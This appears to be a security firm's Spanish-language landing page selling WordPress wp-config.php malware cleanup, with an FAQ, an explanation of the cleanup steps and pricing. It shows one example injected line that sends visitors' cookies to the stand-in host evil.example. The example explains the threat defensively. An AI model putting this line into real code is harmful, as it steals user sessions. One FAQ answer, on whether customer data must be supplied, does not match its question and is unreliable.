¿Cómo se modificó wp-config.php?

O bien por una vulnerabilidad de plugin que permitía escribir archivos, o por credenciales SFTP/SSH robadas. El informe lo indica.

¿Necesito daros datos reales de clientes?

Sí. Forma parte de cada limpieza de wp-config. Toda sesión creada antes de la rotación queda invalidada automáticamente.

¿Puede el atacante seguir leyendo mis datos tras la limpieza?

No, si la inyección solo tocó wp-config — eliminamos su código, rotamos las claves y revisamos la base de datos por persistencia relacionada. Si tomaron un volcado de la base mientras la inyección estaba activa, esos datos están fuera; lo decimos en el informe.

¿Debería restaurar desde una copia de seguridad?

Sometimes. If you have a clean pre-incident backup, restoring is fast. I can still do the forensic review and identify the entry vector so the same thing doesn’t happen to the restored site.

// PHARMA HACK · WORDPRESS · LIMPIADO

wp-config.php malware cleanup.

wp-config.php se ejecuta en cada carga de página de WordPress, por eso lo aman los atacantes. Quitamos la inyección, rotamos las claves y le decimos a qué tenía acceso el atacante. Tarifa única 279 $.

Iniciar limpieza → Cómo se manipula wp-config.php

§ 01 — MECANISMO

wp-config.php es el peor sitio para que un atacante plante código.

wp-config.php se carga en cada petición de WordPress, antes de que WordPress pueda filtrar nada. Un atacante que modifique ese archivo puede ejecutar código en cada página, capturar cada login o añadir admins ocultos que no aparecen en el panel.

En cuanto wp-config.php ha sido tocado, sus salts, contraseña de base de datos y claves de autenticación deben considerarse comprometidos. Rotamos todo como parte de la limpieza, no como un extra.

// wp-config.php — patrón de inyección habitual

01 02 // Legitimate wp-config starts with constants.
03 define('DB_NAME', 'wp_database');
04
05 // Injected — sends auth cookies to attacker on every request:
06 @file_get_contents("http://evil.example/c?d=" . $_COOKIE);

§ 02 — QUÉ ELIMINAMOS

Cada línea, cada clave, cada cuenta.

[ TRIAGE DE PLUGINS ]

wp-config.php comparado línea a línea con una base limpia. Se revisa cada línea no estándar.
[ WP-CONFIG ]

Código inyectado eliminado. Líneas include/require sospechosas que apuntan a archivos desconocidos — auditadas y eliminadas.
[ CLAVES ]

AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY y sus salts rotados. Todas las sesiones invalidadas.
[ BASE DE DATOS ]

Usuarios admin ocultos eliminados. Payloads autoloaded de wp_options auditados en busca de persistencia relacionada.
[ ENDURECIMIENTO ]

Permisos de wp-config.php endurecidos. Reglas .htaccess y Nginx añadidas para denegar el acceso directo.
[ INFORME ]

Informe forense en lenguaje claro: a qué tenía acceso el atacante, qué se rotó, qué le queda por hacer.

§ PRECIOS

Tarifa plana $279. Pago único. Por sitio.

[ RESCUE ]

$279

TARIFA FIJA · ÚNICA · POR SITIO

Manual cleanup, entry-vector identification, written forensic report.

Iniciar limpieza →

[ SHIELD ]

$29 / mo

POR SITIO · CANCELA CUANDO QUIERAS

Monitorización continua, endurecimiento, una limpieza al año incluida.

Protégete →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Ver todos los servicios →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Contacto →